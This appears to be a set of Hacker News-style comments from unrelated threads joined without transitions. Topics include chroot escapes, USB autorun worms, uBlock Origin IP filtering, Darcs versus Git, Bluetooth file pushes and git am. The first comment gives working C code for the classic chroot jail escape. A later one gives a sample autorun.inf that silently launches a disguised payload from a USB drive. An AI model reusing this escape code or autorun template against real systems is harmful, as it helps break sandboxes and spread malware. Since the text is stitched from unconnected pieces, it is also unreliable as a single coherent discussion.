chroot doesn't nest: there is only one root active for a given process at any given moment. If you're inside a chrooted environment and call chroot() on a subdirectory without chdir()ing into it, you regain access to the parent directories.
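This is the classic chroot escape. A minimal sketch in C (the scratch directory name is illustrative, and actually performing the escape requires CAP_SYS_CHROOT, i.e. typically root, inside the jail):

```c
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Attempt the classic escape. Returns 0 on success, -1 otherwise.
 * Needs CAP_SYS_CHROOT inside the jail. */
int escape_chroot(void) {
    /* 1. Make a scratch dir and chroot() into it WITHOUT chdir()ing
     *    first: the process cwd now lies OUTSIDE the new root. */
    (void) mkdir("x", 0700);
    if (chroot("x") != 0) {
        perror("chroot");
        return -1;
    }
    /* 2. From a cwd outside the root, ".." lookups are not clamped,
     *    so climb until we reach the real filesystem root. */
    for (int i = 0; i < 64; i++)
        (void) chdir("..");
    /* 3. Re-anchor the root at wherever we ended up: the real "/". */
    return chroot(".");
}
```

The key detail is step 1: since the kernel tracks only one root per process, a second chroot() simply replaces the first, and a cwd left outside the new root is enough to walk back out.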
Which is why, before fs namespaces, as part of security research prototype work I did, I created a "chroot-aware" mechanism (not quite the right term, but close enough for this context) that wouldn't let one walk past certain directories: lookup() would fail for them, no matter what permissions the user had, once the process entered "pseudo namespace" mode via this chroot mechanism. It was very easy to accomplish, but also very much a hack that fs namespaces are a much better fit for.
AFAIK it only worked with optical drives, not pendrives. I spent hours back in the day trying to get this functionality on my pendrives, to no avail (thankfully!). That was on Windows XP, and Windows 98 needed external drivers to even use pendrives at all, so if such an attack vector existed, it must have been on Windows 2000 or Me (i.e. between 98 and XP), an arguably very short time frame (if at all!).
I don't remember all the details, but I believe it installed an autorun.inf file on all USB drives so that inserting the drive into another PC would install it automatically.
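For context, the mechanism was just a plain INI file at the drive's root. A sketch of what such a file typically looked like (the payload path and disguise strings are hypothetical, not from any specific worm):

```ini
[autorun]
; Hypothetical payload: launched on insertion by Windows versions
; that honored autorun for the drive type
open=RECYCLER\payload.exe
; Disguise the entry with a familiar icon and menu text
icon=%SystemRoot%\system32\shell32.dll,4
action=Open folder to view files
```

Microsoft eventually disabled autorun for non-optical removable media precisely because of this class of attack.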
The title seems to be wrong: uBlock Origin has supported this for many years at this point (only on Firefox). This seems to be a refactor of that code, not a whole new feature.
It sounds to me like more than just a refactor: it now allows blocking based on IP earlier, before the request is actually made. That still isn't perfect, though, because it doesn't know which IP address the browser will choose if a single domain resolves to multiple IPs.
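The multiple-IP caveat is easy to see from an ordinary resolver lookup. A minimal Python sketch (the function name is mine, not uBlock's):

```python
import socket

def resolved_addresses(host: str, port: int = 443) -> list[str]:
    """All addresses the resolver returns for `host`.

    An IP-based filter applied before the request only sees this whole
    set; it can't know which address the browser's connection logic
    (e.g. Happy Eyeballs) will actually end up using.
    """
    infos = socket.getaddrinfo(host, port, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})
```

Calling this on a large CDN-hosted domain will typically return several A/AAAA records, any one of which the browser might pick.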
Ok, I've reverted the title to that of the page. Submitted title was "uBlock Origin supports filtering CNAME cloaking sites on Firefox now". If someone wants to suggest a more accurate and neutral title, we can change it again. Github commits without additional context don't usually make for great HN threads though...
It's usually run as a local web application with the browser running on the same machine as the backend, though it's possible to bind it to non-localhost interfaces.
One more point I'd add to (2): given its massive inertia / network effect, the tooling and the resources are leagues ahead of everything else. I'm using Darcs for a few personal projects, and while the core ideas are great, the tooling is just worse: from the ways to customize which diff utilities to use, to integrations with text editors (the vc-darcs module for Emacs is pretty barebones, especially compared to Magit, but even compared to the basic vc-git).
Darcs is a name that always makes me a little nostalgic; its approach to a VC system was such an obvious idea. Unfortunately, when I used it 10+ years ago we hit the "merge of doom" problem too often.
I was sorry to see it go away, but Mercurial took over for a while, and then later I switched to Git because everybody else had done so.
ISTR that around the Galaxy Nexus era, Google did demos of beaming files between devices via Wi-Fi Direct after having exchanged info with an NFC tap.
But that was just before they decided everything had to go via their cloud.
Curiously, if you rode a London bus around 2005 with Bluetooth on, you would experience a lot of files being sent to you via ad hoc networks.
This works only under the assumption that GitHub won't change the current DNS setup that happens to work this way. A trivial counterexample would be adding a record for the specific subdomain one used, directing it to some completely different IP address. Not something I'd be willing to bet on, especially considering the much cleaner solution from the original post.
A minor correction: it's usually preferable to apply patches with `git am` instead of `git apply`, as it recreates the commit with all its metadata (author, date, message), not just the diff.
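A minimal end-to-end sketch of the difference (repo names, file names, and commit subjects are all illustrative):

```shell
set -e
work=$(mktemp -d) && cd "$work"

# A source repo with a commit authored by "Alice"
git init -q src && cd src
git config user.name Bob && git config user.email bob@example.com
echo base > file.txt && git add file.txt && git commit -qm "base"
echo change >> file.txt && git add file.txt
git commit -qm "feature: tweak file" --author="Alice <alice@example.com>"
git format-patch -1 HEAD -o "$work/patches" >/dev/null

# A destination repo starting from the same base commit
cd "$work" && git init -q dst && cd dst
git config user.name Bob && git config user.email bob@example.com
echo base > file.txt && git add file.txt && git commit -qm "base"

# `git am` recreates the commit itself, metadata included:
git am "$work"/patches/0001-*.patch
git log -1 --format='%an: %s'   # prints "Alice: feature: tweak file"

# `git apply <patch>` would instead only modify the working tree:
# no commit is created, and the author/date/message are lost.
```

Since `format-patch` output is a mail-formatted message, `git am` can replay the whole commit; `git apply` only ever sees the diff hunks.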